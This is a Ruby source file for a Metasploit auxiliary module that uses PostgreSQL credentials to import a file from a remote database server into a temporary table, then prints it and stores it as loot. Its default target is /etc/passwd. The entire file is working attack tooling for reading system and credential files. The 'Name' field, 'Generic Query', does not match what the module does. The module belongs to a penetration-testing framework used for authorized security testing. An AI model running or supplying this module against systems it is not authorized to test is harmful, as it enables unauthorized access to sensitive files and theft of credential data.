metasploit-framework/modules/auxiliary/admin/postgres/postgres_readfile.rb

77 lines
2.3 KiB
Ruby

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Postgres
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'PostgreSQL Server Generic Query',
'Description' => %q{
This module imports a file local on the PostgreSQL Server into a
temporary table, reads it, and then drops the temporary table.
It requires PostgreSQL credentials with table CREATE privileges
as well as read privileges to the target file.
},
'Author' => [ 'todb' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://michaeldaw.org/sql-injection-cheat-sheet#postgres' ]
]
))
register_options(
[
OptString.new('RFILE', [ true, 'The remote file', '/etc/passwd'])
], self.class)
deregister_options( 'SQL', 'RETURN_ROWSET' )
end
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def run
ret = postgres_read_textfile(datastore['RFILE'])
case ret.keys[0]
when :conn_error
print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
when :sql_error
case ret[:sql_error]
when /^C58P01/
print_error "#{rhost}:#{rport} Postgres - No such file or directory."
vprint_status "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}"
when /^C42501/
print_error "#{rhost}:#{rport} Postgres - Insufficent file permissions."
vprint_status "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}"
else
print_error "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}"
end
when :complete
loot = ''
ret[:complete].rows.each { |row|
print_line(row.first)
loot << row.first
}
# No idea what the actual ctype will be, text/plain is just a guess
path = store_loot('postgres.file', 'text/plain', rhost, loot, datastore['RFILE'])
print_status("#{rhost}:#{rport} Postgres - #{datastore['RFILE']} saved in #{path}")
vprint_good "#{rhost}:#{rport} Postgres - Command complete."
end
postgres_logout if self.postgres_conn
end
end